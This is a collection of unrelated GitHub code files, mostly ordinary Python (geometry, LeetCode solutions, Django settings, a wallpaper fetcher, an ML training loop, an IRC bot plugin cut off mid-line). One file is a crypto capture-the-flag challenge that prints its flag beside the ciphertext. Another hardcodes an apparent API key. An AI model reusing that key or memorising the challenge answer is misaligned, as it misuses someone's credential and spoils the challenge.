== 0:\n return None\n\n n = len(segments) // 2\n s = segments[n]\n infront = []\n behind = []\n\n node = Node()\n\n for segment in segments:\n side = s.side(segment)\n\n if side == \"coincident\":\n node.segments.append(segment)\n elif side == \"infront\":\n infront.append(segment)\n elif side == \"behind\":\n behind.append(segment)\n else:\n s1, s2 = segment.split(s)\n \n if s.side(s1) == \"behind\":\n behind.append(s1)\n infront.append(s2)\n elif s.side(s1) == \"infront\":\n infront.append(s1)\n behind.append(s2)\n else:\n raise Exception(\"sounds like it has a bug\")\n\n node.left = binary_space_partition(infront)\n node.right = binary_space_partition(behind)\n return node\n\n","repo_name":"zzag/codesamples","sub_path":"binary_space_partition.py","file_name":"binary_space_partition.py","file_ext":"py","file_size_in_byte":2825,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"68"} +{"seq_id":"43518854113","text":"#!/usr/bin/env python\n# coding=utf-8\n\n\nclass Solution:\n def isPlaindrome(self, s: 'str') -> 'bool':\n if len(s) < 2:\n return True\n sList = []\n s = s.lower()\n for word in s:\n if word.isalnum():\n sList.append(word)\n n = len(sList) // 2\n if sList[:n] == sList[::-1][:n]:\n return True\n return False\n\n\nclass Solution:\n def isPlaindrome(self, s: 'str') -> 'bool':\n if len(s) < 2:\n return True\n s = s.lower()\n left = 0\n right = len(s) - 1\n while right - left > 0:\n if not s[left].isalnum():\n left += 1\n continue\n if not s[right].isalnum():\n right += 1\n continue\n if s[left] == s[right]:\n left += 1\n right -= 1\n else:\n return False\n return True\n","repo_name":"DavidHydroneWang/ProgramExercise","sub_path":"Python/TuJie_LeetCode_Python/Chapter5/isPlaindrome.py","file_name":"isPlaindrome.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"74280373656","text":"import os\nimport progressbar\nimport shutil\nimport pandas as pd\n\n\n# asf (0 , 2), (4 , 6), (8 , 12), (15 , 20), (25 , 32), (38 , 43), (48 , 53), (60 , 100)\ndef making_folders():\n cwd = os.getcwd()\n train = os.path.join(cwd, 'train_age')\n val = os.path.join(cwd, 'val_age')\n os.mkdir(train)\n os.mkdir(val)\n\n for i in range(8):\n a = os.path.join(train, str(i))\n os.mkdir(a)\n \n for i in range(8):\n a = os.path.join(val, str(i))\n os.mkdir(a)\n\n\ndef making_csv():\n cwd = os.getcwd()\n dirs = os.listdir(cwd)\n lines = []\n for i in dirs:\n a = i.split('_')\n if(len(a) >= 2):\n if(a[0] == 'fold'):\n file = open(i, 'r')\n l = file.readlines()\n for ii in l:\n lines.append(str(ii))\n \n main_folder = os.path.join(cwd, 'old_train_test_val')\n sub_folder = os.listdir(main_folder) # train, test, val\n files_names = []\n for i in sub_folder:\n s = os.path.join(main_folder, str(i))\n female_male = os.listdir(s)\n for j in female_male:\n name = os.path.join(main_folder, str(i)+'/'+str(j))\n files = os.listdir(name)\n for k in files:\n files_names.append(str(k))\n \n # (0-2)->1, (4-6)->2, (8-12)->3, (15-20)->4, (25-32)->5, (38-43)->6, (48-53)->7, (60-100)->8 \n cat = ['(0, 2)', '(4, 6)', '(8, 12)', '(8, 23)', '(15, 20)', '(25, 32)', '(27, 32)', '(38, 42)', '(38, 43)', '(38, 48)', '(48, 53)', '(60, 100)']\n # 0->1 1->2 2->3 3->4 4->4 5->5 6->5 7->6 8->6 9->6 10->7 11->8 \n age_c = []\n for i in lines:\n line = i.split('\\t')\n age = line[3]\n if(age not in age_c):\n if(len(age.split()) > 1):\n age_c.append(age)\n print(age_c)\n name_csv = []\n label_csv = []\n per = 0\n bar = progressbar.ProgressBar(maxval=len(lines), widgets=[progressbar.Bar('=', '[', ']'), ' ', progressbar.Percentage()])\n bar.start()\n for i in lines:\n bar.update(per+1)\n per+=1\n line = i.split('\\t')\n if(len(line) < 4):\n continue\n name = line[1]\n type_ = line[2]\n age = str(line[3])\n if(age not in cat):\n continue\n fuddu = age.split()\n l = len(fuddu)\n if(l <= 1):\n continue\n else:\n for j in files_names:\n fullname = j.split('.')\n if(len(fullname) > 3):\n a = fullname[-2]+'.jpg'\n b = fullname[-3]\n if(a == name and b == type_):\n name_csv.append(j)\n if(age == cat[0]): label_csv.append(1)\n elif(age == cat[1]): label_csv.append(2)\n elif(age == cat[2]): label_csv.append(3)\n elif(age == cat[3] or age == cat[4]): label_csv.append(4)\n elif(age == cat[5] or age == cat[6] ): label_csv.append(5)\n elif(age == cat[7] or age == cat[8] or age == cat[9]): label_csv.append(6)\n elif(age == cat[10]): label_csv.append(7)\n elif(age == cat[11]): label_csv.append(8)\n else:\n print('Fault')\n exit(0)\n \n list_of_tuples = list(zip(name_csv, label_csv)) \n dataframe = pd.DataFrame(list_of_tuples, columns = ['name', 'label'])\n print(dataframe.head())\n dataframe.to_csv('name_label.csv', index=False)\n df = pd.read_csv('name_label.csv')\n print(df.head())\n\n\n\nmaking_csv()\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Amrit-pal-Singh/Gender-age-expression-detector","sub_path":"src/making_age_csv.py","file_name":"making_age_csv.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"10818923540","text":"import os\nfrom os import path\nimport dj_database_url\nif path.exists(\"env.py\"):\n import env\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = os.getenv(\"SECRET_KEY\")\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = os.environ.get(\"DEV\")\n\n\nALLOWED_HOSTS = ['127.0.0.1',\n 'fragile-art.herokuapp.com', 'fragileart.rwells.dev']\n\n\n# Application definition\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth', # Needed for Allauth, do not remove!\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages', # Needed for Allauth, do not remove!\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n\n 'allauth',\n 'allauth.account',\n 'allauth.socialaccount',\n\n 'home',\n 'portfolio',\n 'store',\n 'clients',\n 'contact',\n 'basket',\n 'checkout',\n 'users',\n 'storages',\n\n # additionals\n\n 'crispy_forms',\n 'sweetify'\n]\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'whitenoise.middleware.WhiteNoiseMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n]\n\nROOT_URLCONF = 'FragileArt.urls'\n\nCRISPY_TEMPLATE_PACK = 'bootstrap4'\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n os.path.join(BASE_DIR, 'templates', 'allauth'),\n ],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n 'basket.contexts.basket_contents',\n ],\n 'builtins': [\n 'crispy_forms.templatetags.crispy_forms_tags',\n 'crispy_forms.templatetags.crispy_forms_field',\n ]\n },\n },\n]\n\nAUTHENTICATION_BACKENDS = (\n # Needed to login by username in Django admin, regardless of `allauth`\n 'django.contrib.auth.backends.ModelBackend',\n\n # `allauth` specific authentication methods, such as login by e-mail\n 'allauth.account.auth_backends.AuthenticationBackend',\n)\n\nWSGI_APPLICATION = 'FragileArt.wsgi.application'\n\n\nSITE_ID = 1\n\nACCOUNT_AUTHENTICATION_METHOD = 'username_email'\nACCOUNT_EMAIL_REQUIRED = True\nACCOUNT_SIGNUP_EMAIL_ENTER_TWICE = False\nACCOUNT_USERNAME_MIN_LENGTH = 6\nLOGIN_URL = '/accounts/login/'\nLOGIN_REDIRECT_URL = '/store/'\nACCOUNT_SIGNUP_REDIRECT_URL = '/store/'\nACCOUNT_EMAIL_VERIFICATION = 'none'\n\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n\nDATABASES = {\n 'default': dj_database_url.parse(os.environ.get('DATABASE_URL'))\n}\n\n\n# Password validation\n# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nprint(\"hello there\")\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\nif 'USE_AWS' in os.environ:\n\n AWS_S3_OBJECT_PARAMETERS = {\n 'Expires': 'Thu, 31 Dec 2099 20:00:00 GMT',\n 'CacheControl': 'max-age=94608000',\n }\n\n AWS_STORAGE_BUCKET_NAME = 'fragileart'\n AWS_S3_REGION_NAME = 'eu-west-2'\n AWS_ACCESS_KEY_ID = os.environ.get('AWS_ACCESS_KEY_ID')\n AWS_SECRET_ACCESS_KEY = os.environ.get('AWS_SECRET_ACCESS_KEY')\n AWS_S3_CUSTOM_DOMAIN = f'{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com'\n\n STATICFILES_STORAGE = 'custom_storages.StaticStorage'\n STATICFILES_LOCATION = 'staticfiles'\n DEFAULT_FILE_STORAGE = 'custom_storages.MediaStorage'\n MEDIAFILES_LOCATION = 'media'\n\nSTATIC_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{STATICFILES_LOCATION}/'\nMEDIA_URL = f'https://{AWS_S3_CUSTOM_DOMAIN}/{MEDIAFILES_LOCATION}/'\n\nSTATICFILES_DIRS = (os.path.join(BASE_DIR, 'static'),)\nSTATIC_ROOT = os.path.join(STATIC_URL, 'staticfiles')\nSTATICFILES_STORAGE = 'django.contrib.staticfiles.storage.StaticFilesStorage'\n\nMEDIA_ROOT = os.path.join(MEDIA_URL, 'media')\n\nDELIVERY_PERCENTAGE = 15\n\n# stripe settings\n\nSTRIPE_CURRENCY = 'GBP'\nSTRIPE_PUBLIC_KEY = os.getenv('STRIPE_PUBLIC_KEY', '')\nSTRIPE_SECRET_KEY = os.getenv('STRIPE_SECRET_KEY', '')\n\n# sweetalert specification\nSWEETIFY_SWEETALERT_LIBRARY = 'sweetalert2'\n","repo_name":"D0nni387/FragileArt","sub_path":"FragileArt/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5998088460","text":"# The objective is to find the greatest prime factor of 600851475143\n\nimport time\n\nfrom functools import reduce\n\ndef factors(n): \n return set(reduce(list.__add__, \n ([i, n//i] for i in range(1, int(n**0.5) + 1) if n % i == 0)))\n\ndef check_if_prime(n):\n if n == 1:\n return False\n \n i = 2\n while (i**2) <= n:\n if n % i == 0:\n return False\n i += 1\n return True\n \n\n\ndef greatest_prime_factor(n):\n start = time.time()\n list_of_factors_of_n = factors(n)\n list_of_prime_factors_of_n = []\n for j in list_of_factors_of_n:\n if check_if_prime(j) == True:\n list_of_prime_factors_of_n.append(j)\n else:\n continue\n duration = time.time() - start\n return sorted(list_of_prime_factors_of_n)[-1:],duration\n\n\ndef run():\n print(greatest_prime_factor(600851475143))\n\nif __name__ == \"__main__\":\n run()\n\n","repo_name":"rbanerjee919/Project-Euler-Problems","sub_path":"Problem 3.py","file_name":"Problem 3.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"17669159177","text":"import copy\nfrom collections import deque\n\nsubin, bro = map(int, input().split(\" \"))\n\nvisit = [False for i in range(100001)]\nvisit[subin] = True\nresult = 100001\nif subin==bro:\n print(0)\n print(1)\nelse:\n q = [[subin, 0]]\n q = deque(q)\n result_count = 0\n while q:\n popped = q.popleft()\n visit[popped[0]] = True\n\n if popped[0] == bro and popped[1] < result:\n result = popped[1]\n result_count = 1\n continue\n\n elif popped[0] == bro and popped[1] == result:\n result_count += 1\n continue\n\n if popped[0] + 1 <= 100000 and visit[popped[0] + 1] is False:\n q.append([popped[0] + 1, popped[1] + 1])\n\n if popped[0] - 1 >= 0 and visit[popped[0] - 1] is False:\n q.append([popped[0] - 1, popped[1] + 1])\n\n if popped[0] * 2 <= 100000 and visit[popped[0] * 2] is False:\n q.append([popped[0] * 2, popped[1] + 1])\n\n print(result)\n print(result_count)\n","repo_name":"ehddn5252/Algorithm","sub_path":"personalWorkspace/backjoon/etc/Bj12851.py","file_name":"Bj12851.py","file_ext":"py","file_size_in_byte":992,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"68"} +{"seq_id":"9798816290","text":"from os import getenv, walk, remove, link, listdir\nfrom os.path import exists, join\nfrom os.path import split as psplit\nfrom json import load, dump\nfrom subprocess import run, Popen, PIPE\nfrom re import compile\nfrom ictl.util import Logger, tmenu_select, sh, fork, httprequest, find, randstr\nfrom io import open\nfrom ictl.config import ctrl_bin, pop_term, Cfg\nfrom time import time\nfrom random import Random\nfrom sys import argv\nfrom ictl.config import get_renderer\n\nlogger = Logger()\nrnd = Random()\nrnd.seed(int(time()) + 19)\n\nHome = getenv(\"HOME\") \nwlprs = Home + \"/.wlprs/\"\n\nurlr = {\n \"bing\": {\n \"url\": lambda: \"https://www.bing.com/HPImageArchive.aspx?format=xml&idx=%s&n=1\" % randstr(13),\n \"parse\": lambda s: (\n (lambda res: (\n \"http://www.bing.com\" + res,\n res[res.find(\"id=\") + 3:res.find(\"jpg\") + 3]\n ))(s[s.find(\"\") + 5:s.find(\"\") - 1])\n )\n },\n \"nasa\": {\n \"url\": lambda: \"https://api.nasa.gov/planetary/apod?api_key=cRFIBE5eZnucIQxhm3jJGJopmXDBTQsTkAQal6Qu&count=1\",\n \"parse\": lambda s: print(\"TODO %s\" % s)\n }\n}\n\ndef getwallpaper(provider='bing'):\n print(\"#getwallpaper provider %s\" % provider)\n pro = urlr[provider]\n status, _, body = httprequest(\"GET\", pro[\"url\"]())\n print(\"#getwallpaper response: [%s] [%s]\" % (status, body))\n if status != 200:\n return\n url, name = pro[\"parse\"](body.decode())\n print(\"#getwallpaper: [%s] [%s]\" % (url, name))\n status,_,body = httprequest(\"GET\", url)\n with open(wlprs + name, \"wb\") as file:\n file.write(body)\n if exists(wlprs + \"wallpaper\"):\n remove(wlprs + \"wallpaper\")\n link(wlprs + name, wlprs + \"wallpaper\")\n return wlprs + name\n\ndef selectwallpaper(dir):\n wps = listdir(dir)\n if wps:\n return join(dir, rnd.choice(wps))\n\ndef applywallpaper():\n if Cfg[\"wallpapermode\"] == \"new\":\n try:\n wp = getwallpaper()\n except e as Exception:\n print(\"could not get wallpaper\", e)\n wp = selectwallpaper(wlprs)\n elif Cfg[\"wallpapermode\"] == \"fixed\":\n wp = Home + \"/\" + Cfg[\"wallpaperfixd\"]\n elif Cfg[\"wallpapermode\"] == \"folder\":\n wp = selectwallpaper(Home + \"/\" + Cfg[\"wallpapersdir\"])\n else:\n wp = selectwallpaper(wlprs)\n print(\"applying wallpaper %s\" % wp)\n applywallpaperCmd(wp)\n\ndef applywallpaperCmd(wp):\n r = get_renderer()\n if r.find('wayland') > -1:\n sh([\"killall\", \"-q\",\"swaybg\"])\n fork([\"swaybg\", \"-m\", \"center\", \"-i\", wp])\n else:\n sh([\"feh\", \"--bg-scale\", wp])\n\ndef tmenu_set_wallpaper():\n wps = {}\n for k,v in find(wlprs):\n wps[k] = v\n sel = tmenu_select(wps)\n if sel:\n applywallpaperCmd(wps[sel])\n\ndef dmenu_set_wallpaper():\n sh(pop_term(ctrl_bin([\"tmenu_wallpaper\"])))\n\nif __name__ == '__main__':\n mf = {\n '-t': tmenu_set_wallpaper,\n '-d': dmenu_set_wallpaper,\n '-get': getwallpaper,\n '-set': applywallpaper}\n mf[argv[1]]()\n","repo_name":"bucketsize/ictl","sub_path":"ictl/wallpaper.py","file_name":"wallpaper.py","file_ext":"py","file_size_in_byte":3044,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28104605295","text":"import random\nimport numpy as np\nimport torch\nfrom sklearn.metrics import confusion_matrix, f1_score\nfrom edien.utils import get_current_git_hash\n\n\ndef patch_param_grid(bp):\n # sklearn annoyingly checks types\n if hasattr(bp, 'keys'):\n for k in bp.keys():\n if k == 'param_grid':\n print('Found gridsearch CV and patched')\n setattr(bp, k, bp[k].as_dict())\n else:\n patch_param_grid(bp[k])\n\n\ndef only_pseudorandomness_please(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.backends.cudnn.deterministic = True\n torch.backends.cudnn.benchmark = False\n\n\ndef report_eval(true, preds, labels, verbose=False):\n cm = confusion_matrix(true, preds, labels=labels)\n cm = np.array(cm)\n\n PAD = 30\n # Smooth out dividing zeros\n epsilon = 1e-6\n macro_recall = np.diag(cm) / (cm.sum(axis=1) + epsilon)\n macro_precision = np.diag(cm) / (cm.sum(axis=0) + epsilon)\n macro_f1 = (2 * macro_precision * macro_recall)/(macro_precision + macro_recall + epsilon)\n\n # Micro f1 is the same as accuracy for multi-class\n micro_f1 = np.diag(cm).sum() / cm.sum()\n\n # micro_recall = np.diag(cm).sum() / cm.sum()\n # micro_precision = np.diag(cm).sum() / cm.sum()\n\n counts = cm.sum(axis=1)\n if verbose:\n print('%s\\t%s\\t%s\\t%s\\t%s' % ('Score'.ljust(PAD), 'F1', 'Prec', 'Rec', 'Counts'))\n for l, f, p, r, c in zip(labels, macro_f1, macro_precision, macro_recall, counts):\n print('%s\\t%.2f\\t%.2f\\t%.2f\\t%d' % (l.ljust(PAD),\n f * 100,\n p * 100,\n r * 100,\n c))\n print('='*60)\n print('%s\\t%.2f\\t%.2f\\t%.2f\\t%d' % ('Total Macro:'.ljust(PAD),\n macro_f1.mean() * 100,\n macro_precision.mean() * 100,\n macro_recall.mean() * 100,\n counts.sum()))\n print('%s\\t%.2f' % ('Total Micro:'.ljust(PAD), micro_f1 * 100))\n # print(cm)\n print()\n # norm_cm = cm / cm.sum(axis=1, keepdims=True)\n # plot_matrix(norm_cm, labels, normalize=True)\n # plot_matrix(cm, labels, normalize=False)\n\n\ndef eval_loop(y_true, y_pred, verbose=False):\n # targets are the outputs we want to predict\n # we evaluate each output separately\n all_labels = []\n for target, preds in zip(y_pred._fields, y_pred):\n gold = getattr(y_true, target)\n labels = set(gold)\n labels = tuple(sorted(labels, key=lambda x: (x[2:], x)))\n assert len(gold) == len(preds)\n if target == 'negation':\n # We want to do entity level stuff - so let's only take B- prediction\n ent_preds, ent_gold = [], []\n # We purposely double count tokens that are tagged both\n # as modifiers and entities\n for g, p, ent, mod in zip(gold, preds, y_true.ner_tags, y_true.mod_tags):\n if ent[:2] == 'B-':\n ent_gold.append(g)\n ent_preds.append(p)\n if mod[:2] == 'B-':\n ent_gold.append(g)\n ent_preds.append(p)\n gold, preds = ent_gold, ent_preds\n # report_eval(gold, preds, labels=labels, verbose=verbose)\n all_labels.append(labels)\n\n return all_labels\n\n\ndef train_loop(conf):\n\n only_pseudorandomness_please(conf.seed)\n # Patch blueprint inconsistencies\n patch_param_grid(conf)\n conf.paths.experiment_name = conf.name\n bp = conf.build()\n\n # ====================== LOAD DATASET =================================\n\n print('Loading dataset...')\n\n train = bp.data.train_vars(bp.paths)\n\n dev = bp.data.dev_vars(bp.paths)\n\n # ========================== TRAIN ====================================\n\n print('Fitting model...')\n\n # for name, param in model.named_parameters():\n # if param.requires_grad:\n # print(name)\n # else:\n # print('No grad: %s' % name)\n if conf.get('continue_training', None):\n model_path = bp.paths.model_path\n print('Loading model from %s' % model_path)\n model = bp.model.load(model_path)\n else:\n model = bp.model\n\n if conf.device.startswith('cuda'):\n # Set default gpu\n model.to(conf.device)\n\n # NOTE: This needs to be done after moving to gpu\n model.setup_optimizer()\n # NOTE: Hack to access vocab encoder during training\n # To be able to use BIOAccuracy\n model.metrics = bp.data.metrics\n model.vocabs = bp.data.vocab_encoder.vocabs\n\n for task in bp.model.model.tasks:\n bp.model.model.tasks[task].label_vocab = bp.data.vocab_encoder.vocabs[task]\n # print(bp)\n model.fit(train, dev=dev)\n\n # ========================== EVAL =====================================\n\n if bp.verbose:\n # Train eval\n train_preds = model.predict(train)\n\n dec_train_preds = bp.data.decode(train_preds)\n dec_train = bp.data.decode(train)\n\n print('=== Eval Train ===')\n train_labels = eval_loop(dec_train, dec_train_preds)\n\n # Dev eval\n dev_preds = model.predict(dev)\n\n dec_dev_preds = bp.data.decode(dev_preds)\n dec_dev = bp.data.decode(dev)\n\n print('=== Eval Dev ===')\n dev_labels = eval_loop(dec_dev, dec_dev_preds)\n\n # assert train_labels == dev_labels\n\n # ====================== SAVE MODEL TO FILE ===========================\n\n # Update conf details\n conf.edien_git_hash = get_current_git_hash()\n train_metrics = getattr(model, 'train_metrics', None)\n dev_metrics = getattr(model, 'dev_metrics', None)\n best_dev_metrics = getattr(model, 'best_dev_metrics', None)\n best_dev_metrics_time = getattr(model, 'best_dev_metrics_time', None)\n conf.results = dict(train=train_metrics,\n dev=dev_metrics,\n best_dev=best_dev_metrics,\n best_dev_time=best_dev_metrics_time)\n\n if model.persist:\n save_path = bp.paths.model_path\n print('Saving model to %s' % save_path)\n model.save(save_path)\n\n save_path = bp.paths.blueprint_path\n print('Saving blueprint to %s' % save_path)\n # Save unbuilt config as the blueprint used for this experiment\n conf.to_file(save_path)\n else:\n print('Not saving - running in non-persist mode')\n\n return conf\n","repo_name":"Edinburgh-LTG/edieviz","sub_path":"EdIE-N/edien/train_utils.py","file_name":"train_utils.py","file_ext":"py","file_size_in_byte":6606,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"16381754827","text":"from transformers import AutoTokenizer, GPTJForCausalLM\nimport torch\nimport time\n\nfrom model_lib.model_instance import ModelInstance\n\nclass Model(ModelInstance):\n\n def __init__(self) -> None:\n self.model_name = \"GPTJ\"\n self.model_path = 'EleutherAI/gpt-j-6B'\n\n print(\"Loading {model_name}...\".format(model_name=self.model_name))\n\n self.tokenizer = AutoTokenizer.from_pretrained(self.model_path)\n\n self.model = GPTJForCausalLM.from_pretrained(\n self.model_path, torch_dtype=torch.float16, device_map='auto',\n )\n\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n print(\"Device found: {device}\".format(device=device))\n if (torch.cuda.is_available()):\n print(\"GPU: \" + str(torch.cuda.get_device_name(torch.cuda.current_device())))\n\n def generate(self, prompt: str, max_tokens: int) -> str:\n\n inputs = self.tokenizer(prompt, return_tensors=\"pt\").input_ids\n inputs = inputs.to('cuda')\n response = \"\"\n\n if (type(self.model) == GPTJForCausalLM):\n gen_start = time.time()\n generate_ids = self.model.generate(\n inputs, \n do_sample=True, \n temperature=0.9,\n max_length=max_tokens,\n pad_token_id=self.tokenizer.eos_token_id\n\n )\n gen_time = time.time() - gen_start\n print(\"Generation Time: \" + str(gen_time))\n\n response = self.tokenizer.batch_decode(generate_ids, skip_special_tokens=True, clean_up_tokenization_spaces=False)[0]\n\n return response\n","repo_name":"hlucco/open-llm-repl","sub_path":"model_lib/gptj.py","file_name":"gptj.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"20177678262","text":"flag=b'flag{1fsr_c4n_n0t_pr3v3nt_0xb14cb12d~}'\nassert flag.startswith(b\"flag{\")\nassert flag.endswith(b\"}\")\nassert len(flag) == 38\n\nmasklength = 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\n\nclass LFSR:\n def __init__(self,seed,mask):\n self.mask = mask\n self.state = seed\n\n def next(self):\n output = (self.state << 1) & masklength\n i = (self.state & mask) & masklength\n lastbit = 0\n while i!=0:\n lastbit ^= (i & 1)\n i = i >> 1\n output ^= lastbit\n self.state = output\n return lastbit\n\nR = int(flag[5:-1].hex(),16)\nmask = int(bin(int(b'the_little_boy:0xb14cb12d'.hex(),16))[2:130]*2,2)\nlfsr = LFSR(R,mask)\n\ncipher = []\nfor i in range(100):\n tmp=0\n for j in range(8):\n out = lfsr.next()\n tmp=(tmp << 1)^out\n cipher.append(tmp)\n\nprint(bytes(cipher))\n#b'\\xab\\xcf\\xa8\\xdc\\xa8\\x00\\x95\\xfc\\xc5\\x16`\\x91%X^\\xde\\xaf\\x0e\\xd0\\xba\\x0fCg\\rwz\\xc1{\\xfdX\\x1b\\xf1\\x85\\x94\\xddK)\\x8d\\x1e\\xb3s\\xf8\\x18\\x00q\\xc78hT\\x11\\x9c\\xf7\\x9c\\x0e\\x96o3\\x12\\xffl\\xf1\\x1d\\xacD\\xf2F6\\x8d\\xa3\\x06\\x17\\xe5\\xdc\\xe4<\\x8eAa\\x8d\\x04\\xdd\\xab\\xd2\\xd9~\\x17\\x81}\\x16\\x92wWF\\x87\\xb5[@\\\\\\x84\\xe3'\n#flag{1fsr_c4n_n0t_pr3v3nt_0xb14cb12d~}","repo_name":"YunZh1Jun/YunZh1Jun.github.io","sub_path":"img/code/crypto_code/LFSR.py","file_name":"LFSR.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"14498612133","text":"import re\n\nfrom sopel import plugin\n\n\n@plugin.command(\"bullseye\")\ndef bullseye(bot, trigger):\n # !bullseye \n target = trigger.group(3)\n bot.say(\"Bullseye: https://bullseye.toolforge.org/ip/\" + target)\n\n\n@plugin.command(\"ca\")\ndef ca(bot, trigger):\n # !ca \n target = trigger.group(2)\n bot.say(\n \"Meta CentralAuth https://meta.wikimedia.org/wiki/Special:CentralAuth/\"\n + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"contribs\")\ndef contribs(bot, trigger):\n # !contribs \n tricky_ones = [\n \"commons\",\n \"incubator\",\n \"mediawiki\",\n \"outreach\",\n \"sources\",\n \"species\",\n \"wikidata\",\n \"meta\",\n ]\n try:\n project, target = trigger.group(2).split(\" \", 1)\n except ValueError:\n bot.say(\"Something is missing... Syntax is !contribs \")\n return\n target = target.replace(\" \", \"_\")\n if project in tricky_ones:\n if project == \"commons\":\n bot.say(\n \"User contribs: https://commons.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"incubator\":\n bot.say(\n \"User contribs: https://incubator.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"mediawiki\":\n bot.say(\n \"User contribs: https://www.mediawiki.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"outreach\":\n bot.say(\n \"User contribs: https://outreach.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"sources\":\n bot.say(\n \"User contribs: https://www.wikisource.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"species\":\n bot.say(\n \"User contribs: https://species.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"wikidata\":\n bot.say(\n \"User contribs: https://www.wikidata.org/wiki/Special:Contribs/\"\n + target\n )\n elif project == \"meta\":\n bot.say(\n \"User contribs: https://meta.wikimedia.org/wiki/Special:Contribs/\"\n + target\n )\n else:\n try:\n lang, proj = re.split(\"w\", project)\n lang = lang.replace(\"_\", \"-\")\n except ValueError:\n lang = None\n\n target = target.replace(\" \", \"_\")\n\n if lang is not None:\n if proj == \"iki\":\n bot.say(\n \"User contribs: https://\"\n + lang\n + \".wikipedia.org/wiki/Special:Contribs/\"\n + target\n )\n else:\n bot.say(\n \"User contribs: https://\"\n + lang\n + \".w\"\n + proj\n + \".org/wiki/Special:Contribs/\"\n + target\n )\n\n else:\n bot.say(\n \"Hmm... I've tried and just can't figure out which project \"\n + project\n + \" is. I'm sorry.\"\n )\n\n\n@plugin.command(\"geo\")\ndef geo(bot, trigger):\n # !geo \n target = trigger.group(3)\n bot.say(\"Geolocate IP: https://whatismyipaddress.com/ip/1.1.1.1\" + target)\n\n\n@plugin.command(\"google\")\ndef google(bot, trigger):\n # !google \n target = trigger.group(2)\n bot.say(\n \"Google results: https://www.google.com/search?q=\" + target.replace(\" \", \"_\")\n )\n\n\n@plugin.command(\"guc\")\ndef guc(bot, trigger):\n # !guc \n target = trigger.group(2)\n bot.say(\n \"Global contribs, last hour: https://tools.wmflabs.org/guc/?src=hr&by=date&user=\"\n + target\n )\n\n\n@plugin.command(\"gucall\")\ndef gucall(bot, trigger):\n # !gucall \n target = trigger.group(2)\n bot.say(\"Global contribs, all: https://tools.wmflabs.org/guc/?user=\" + target)\n\n\n@plugin.command(\"ipqs\")\ndef ipqs(bot, trigger):\n # !ipqs \n target = trigger.group(3)\n bot.say(\n \"IP Quality Score: https://www.ipqualityscore.com/free-ip-lookup-proxy-vpn-test/lookup/\"\n + target\n )\n\n\n@plugin.command(\"proxy\")\ndef proxy(bot, trigger):\n # !proxy \n target = trigger.group(3)\n bot.say(\"Proxy API Checker: 